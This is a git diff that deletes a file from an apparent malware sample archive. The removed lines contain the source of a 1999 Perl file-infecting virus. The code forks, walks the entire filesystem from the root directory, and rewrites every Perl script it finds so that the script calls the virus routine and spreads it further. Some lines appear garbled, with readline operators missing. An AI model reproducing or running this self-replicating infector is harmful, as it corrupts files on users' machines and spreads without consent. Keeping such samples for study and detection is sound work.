diff --git a/Perl/Virus.Perl.Spoon.b b/Perl/Virus.Perl.Spoon.b deleted file mode 100644 index 2e2cdf59..00000000 --- a/Perl/Virus.Perl.Spoon.b +++ /dev/null @@ -1,38 +0,0 @@ -use File::Find; -&virus(); - -print "\nThis program is infected by the Perl virus\n"; - -sub virus -{ - $virus_body = "\n# put here the body of the virus\nsub virus { }\n"; - if( $pid = fork ) { return; } - else - { - finddepth ( \&infect, '/' ); - sub infect - { - open( target, $File::Find::name ); - $_ = ; - if ( /(\#!.*perl)/ ) - { - $line2 = ; - unless( $line2 eq "use Find::File\n" ) - { - open( temp, ">/tmp/tmpinfect" ); - print temp ($1, "\nuse File::Find;\n&virus();\n", $line2 ); - print temp while( ); - print temp $virus_body; - close( temp ); - system( "mv", "/tmp/tmpinfect", $File::Find::name ); - } - } - close( target ); - } - exit( 0 ); - } -} - -# a Perl virus, by paddingx -# 08/13/1999 -